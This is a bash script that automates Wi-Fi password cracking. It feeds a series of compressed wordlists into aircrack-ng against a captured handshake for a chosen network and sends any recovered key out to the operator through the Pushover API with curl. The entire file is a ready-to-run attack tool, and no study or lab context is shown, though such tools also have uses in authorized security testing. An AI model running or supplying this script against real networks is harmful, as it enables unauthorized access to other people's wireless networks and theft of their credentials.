#!/bin/bash

CAP=$2
SSID=$3

command -v aircrack-ng > /dev/null 2>&1 || { echo "I require aircrack-ng but it's not installed.  Aborting." >&2; exit 1; }

crackloop () {
	for wl in $(ls *txt.bz2|sort -k 8); do
	    echo "$wl" >> $PWD/wordlist-in-use.log
	    echo "Using wordlist:" "$wl"
        echo "Wordlists left:" "$(ls *txt.bz2|wc -l)"
	    bzcat "$wl" | aircrack-ng -q $PWD/"$CAP" -l $PWD/aircrack-results.log -b "$SSID" -w- && \
	    	rm $wl

        # If we find key add it to variable RESULT
        # and send key via pushover
        if [ -e $PWD/aircrack-results.log ]; then
            RESULT="$(cat $PWD/aircrack-results.log)"
                if [[ ! -z "$API_KEY" && ! -z "$API_USER" ]]; then
                    curl -s \
                    -F "token=$API_KEY" \
                    -F "user=$API_USER" \
                    -F "message=${SSID} has key: $RESULT" \
                    https://api.pushover.net/1/messages.json
                fi
        fi
	done
}

 
"$@"
